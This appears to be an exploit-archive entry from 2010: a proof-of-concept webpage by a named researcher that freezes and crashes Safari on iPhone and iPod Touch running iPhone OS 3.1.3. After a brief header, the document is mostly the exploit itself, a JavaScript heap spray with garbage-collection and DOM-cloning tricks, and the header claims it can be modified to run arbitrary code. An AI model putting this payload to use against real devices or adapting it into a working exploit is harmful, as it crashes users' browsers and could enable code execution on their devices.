# Exploit Title: Remote DoS on Safari for iPhone & iPod Touch |
|
# Date: 26/03/2010 |
|
# Author: Nishant Das Patnaik |
# For more of Nishant's research, please visit: |
# http://nishantdaspatnaik.yolasite.com/research.php |
|
# Tested on: iPod Touch 3G (iPhone OS 3.1.3) |
|
# Description: An attacker may direct the user to visit a specially crafted webpage that can lead the Safari browser on iPhone & iPod Touch running iPhone OS 3.1.3 to freeze and finally crash. The attacker can modify to the PoC to run arbitrary code on the device. |
|
# Code: |
|
---------PoC STARTS HERE---------------- |
|
<html> |
<title> Remote DoS on Safari for iPhone & iPod Touch </title> |
<body> |
<script language="JavaScript"> |
var size="%u03e8"; |
var matrix = new Array(); |
var slope = 0x100000-(size.length*2+0x01020); |
var bomb = unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"); |
while(bomb.length<slope/2) { bomb+=bomb;} |
var lh = bomb.substring(0,slope/2); |
delete bomb; |
for(i=0; i<0xC0; i++) { |
matrix[i] = lh + size; |
} |
CollectGarbage(); |
var slope1=unescape("%u0b0b%u0b0b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000AAAAAAAAAAAAAAAAAAAAAAAAA"); |
var matrix1 = new Array(); |
for(var x=0;x<1000;x++) matrix1.push(document.createElement("img")); |
function ready() { |
out1=document.createElement("tbody"); |
out1.click; |
var out2 = out1.cloneNode(); |
out11.clearAttributes(); |
out1=null; CollectGarbage(); |
for(var x=0;x<matrix1.length;x++) matrix1[x].src=slope1; |
out2.click; |
} |
</script> |
<script>window.setTimeout("ready();",800);</script> |
<center> |
<h1> Remote DoS on Safari for iPhone & iPod Touch </h1> |
<h2> (C) Nishant Das Patnaik </h2> |
</center> |
</body> |
</html> |
|
---------POC ENDS HERE---------------- |
0 条评论。